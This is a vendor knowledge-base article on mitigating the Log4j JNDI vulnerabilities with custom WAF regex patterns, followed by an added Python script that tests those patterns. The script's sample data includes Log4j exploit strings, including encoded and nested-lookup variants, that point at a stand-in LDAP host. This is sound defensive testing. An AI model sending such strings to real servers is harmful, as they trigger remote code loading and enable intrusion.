KB44944 - Can PulseSecure Web Application Firewall Module help protect against log4j/jndi vulnerabilities?

Last Modified Date: 12/28/2021 3:09 PM
Problem or Goal
The Log4j project has published several security advisories related to the JNDI interface, as described on the Apache Foundation website and in our KB article KB44933, including:

- CVE-2021-4104
- CVE-2021-44228
- CVE-2021-45046
- CVE-2021-45105

Can WAF help protect against this?
Solution
Our development team is working on this, with an updated WAF baseline expected soon.

Meanwhile, an administrator who wants the WAF to filter out the log4j vulnerability right now can add the following custom handlers under the appropriate application:

- InvalidURLHandler (set invalid_url_pattern)

- RequestHeaderHandler (set invalid_header_pattern)

- RequiredHeaderFieldHandler (set invalid_header_pattern)

The pattern for both of the above could be:
.*(\$|%24)({|%7[bB])(j|J|%6[aA]|%4[aA]|\$|%24).*(}|%7[dD]).*

...or...
 
.*\${.*:.*}.*

The former has a low chance of false positives, but only protects against RCE (i.e. the DoS CVE-2021-45105 is let through). The latter catches all log4j vectors known so far (both RCE and DoS), but with a slightly higher chance of false positives.
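
The following Python script is an added example, not part of the original article or the vendor's tooling: it runs both patterns over constructed sample values so the coverage and false-positive trade-off can be checked before the handlers are enabled. It assumes the handler applies the pattern to the whole raw (undecoded) value with semantics close to Python's `re` module; the sample strings and the names `NARROW`, `BROAD`, `classify` and `coverage` are hypothetical.

```python
import re

# Patterns copied verbatim from the article above.
NARROW = re.compile(r".*(\$|%24)({|%7[bB])(j|J|%6[aA]|%4[aA]|\$|%24).*(}|%7[dD]).*")
BROAD = re.compile(r".*\${.*:.*}.*")

# Constructed sample values (not captured traffic).
# example.invalid is a reserved, non-resolvable name.
SAMPLES = {
    # Lookup strings a WAF rule is expected to stop.
    "plain_jndi": "${jndi:ldap://example.invalid/a}",
    "encoded_jndi": "%24%7Bjndi:ldap://example.invalid/a%7D",
    "nested_lookup": "${${lower:j}ndi:ldap://example.invalid/a}",
    "non_jndi_lookup": "${ctx:userId}",
    # Ordinary text that happens to contain "${...}".
    "shell_var_text": "/search?q=set ${JAVA_HOME}",
    "template_text": "/docs?title=Use ${name:default} in templates",
    "benign_header": "Mozilla/5.0 (X11; Linux x86_64)",
}


def classify(value):
    """Return (narrow_hit, broad_hit) for one URL or header value.

    fullmatch is used because both patterns are wrapped in '.*', i.e. they
    are written to match the entire value (assumption about the handler).
    """
    return (NARROW.fullmatch(value) is not None,
            BROAD.fullmatch(value) is not None)


def coverage(samples=SAMPLES):
    """Map each sample name to its (narrow_hit, broad_hit) result."""
    return {name: classify(value) for name, value in samples.items()}


if __name__ == "__main__":
    for name, (narrow, broad) in coverage().items():
        print(f"{name:16} narrow={'BLOCK' if narrow else 'pass':5} "
              f"broad={'BLOCK' if broad else 'pass'}")
```

The broad pattern contains only literal `$` and `{`, so its result on percent-encoded values depends on whether the handler sees the value before or after URL decoding; verify that on the WAF itself.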
Created By: Andy Chernyak